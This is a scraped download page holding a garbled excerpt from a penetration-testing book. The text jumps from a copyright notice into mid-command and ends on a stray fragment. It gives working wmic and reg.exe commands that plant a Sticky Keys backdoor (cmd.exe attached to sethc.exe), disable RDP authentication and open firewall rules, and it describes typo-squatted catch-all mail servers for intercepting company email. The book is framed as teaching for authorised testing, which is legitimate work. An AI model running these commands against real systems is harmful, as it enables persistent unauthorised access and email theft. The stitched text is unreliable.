The Hacker Playbook 2: Practical Guide To ... - arthur-training.com

Download PDF
5 downloads 253 Views 23MB Size Report
Comment
Jul 1, 2015 - Open Source Versus Commercial Software. Setting Up Your .... You need to have some experience with Microso
THE HACKER PLAYBOOK 2 Practical Guide To Penetration Testing Peter Kim

Copyright © 2015 by Secure Planet LLC. All rights reserved. Except as permitted under United States Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a new enable=Yes ● Enable Remote Desktop Connections ○ REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Term Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Don’t forget the power of WMI and being able to trigger these settings remotely. Remember you will be a privileged local administrative account or domain admin. ● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f" ● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" ● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp\" /v SecurityLayer /t REG_DWORD /d 0 /f" Optional Commands: ● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" ● wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f" Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing the username/password to /authority:"Kerberos:[Domain]\[Server]". Remember pass the ticket? Once we have configured these registry settings, we can RDP to that host without any credentials, hit shift 5 times, and we have a system shell. If you ever lose your original shell and the user changes their password, you still have your backdoor.

Sticky Keys

Conclusion I hope this chapter was able to get you comfortable with getting onto the network and moving laterally through the network. There are a large number of attacks that can help in both lateral movement and privilege escalation, but it really comes down to understanding what is in scope of your test and what has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement section to get you to a Domain Administrator, but keep this chapter handy as sometimes you will run into a brick wall and something in this book might just get you out of a jam.

The Screen - Social Engineering If client attacks are in the scope of your tests, social engineering is your "go to" attack. There are many different ways to perform social engineering attacks and these can range from domain attacks to spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own creativity, I will just go over a few examples that I have found to be fruitful.

Doppelganger Domains I spent a lot of research time looking into doppelganger domains and trying to find the most efficient and most “bang for your buck” attacks. You can find more in my research paper here: http://www.wired.com/threatlevel/2011/09/doppelganger-domains/. The concept of my research paper was to brute-force company domains for valid subdomains that had MX records. For my next few examples we have two different fictitious companies who utilize their sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently make the mistake of forgetting to type in the period between the domain and sub-domain.

SMTP Attack Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set all SMTP servers as catch-all servers. This means that if anyone emails to the domain I own, regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. This is usually enough to prove that you can successfully capture sensitive 2. Somewhere below, add: